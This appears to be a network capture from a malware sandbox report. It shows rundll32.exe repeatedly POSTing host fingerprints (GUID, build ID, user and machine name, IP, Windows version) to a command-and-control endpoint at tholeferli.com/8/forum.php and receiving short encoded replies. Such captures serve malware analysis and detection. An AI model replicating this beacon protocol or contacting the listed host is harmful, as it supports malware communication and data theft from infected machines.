                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:59.314548969 CEST | 421 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:00.484059095 CEST | 421 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:00 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 4b 50 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cAKPZARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                113 | 192.168.2.22 | 49280 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:00.777880907 CEST | 422 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:00.946420908 CEST | 422 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:00 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 4a 51 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFJQUARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                114 | 192.168.2.22 | 49281 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:01.224749088 CEST | 423 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:01.392529964 CEST | 423 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:01 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 47 54 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQGTJARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                115 | 192.168.2.22 | 49282 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:01.675998926 CEST | 424 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:01.863708019 CEST | 424 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:01 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 43 58 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYCXBARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                116 | 192.168.2.22 | 49283 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:02.156478882 CEST | 425 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:02.312468052 CEST | 425 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:02 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZZAAARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                117 | 192.168.2.22 | 49284 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:02.584587097 CEST | 426 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:02.740611076 CEST | 426 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:02 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4b 59 42 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cKYBPARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                118 | 192.168.2.22 | 49285 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:03.016128063 CEST | 427 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:03.171837091 CEST | 428 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:03 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 4b 50 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNKPMARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                119 | 192.168.2.22 | 49286 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:03.467390060 CEST | 429 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:03.625241041 CEST | 429 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:03 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 4a 51 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBJQYARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                12 | 192.168.2.22 | 49179 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:08.277009010 CEST | 308 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:08.445487022 CEST | 309 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:08 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 43 58 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTCXGARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                120 | 192.168.2.22 | 49287 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:03.907593966 CEST | 430 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:04.076158047 CEST | 430 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:03 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 4e 4d 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGNMTARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                121 | 192.168.2.22 | 49288 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:04.350253105 CEST | 431 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:04.520309925 CEST | 431 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:04 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGMNTARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                122 | 192.168.2.22 | 49289 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:04.812446117 CEST | 432 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:04.979065895 CEST | 432 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:04 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 56 45 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQVEJARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                123 | 192.168.2.22 | 49290 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:05.250222921 CEST | 433 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:05.405751944 CEST | 433 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:05 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 4e 4d 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJNMQARRABw==0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                124 | 192.168.2.22 | 49291 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:05.685089111 CEST | 434 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:05.841520071 CEST | 434 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:05 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZZAAARRABw==0


                                                Session ID: 125 | Source IP: 192.168.2.22 | Source Port: 49292 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:06.127482891 CEST | 435 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:06.294018030 CEST | 436 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:06 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZFUAARRABw==0


                                                Session ID: 126 | Source IP: 192.168.2.22 | Source Port: 49293 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:06.582639933 CEST | 436 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:06.749896049 CEST | 437 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:06 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 59 42 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMYBNARRABw==0


                                                Session ID: 127 | Source IP: 192.168.2.22 | Source Port: 49294 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:07.026973963 CEST | 437 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:07.183212042 CEST | 438 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:07 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTZAGARRABw==0


                                                Session ID: 128 | Source IP: 192.168.2.22 | Source Port: 49295 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
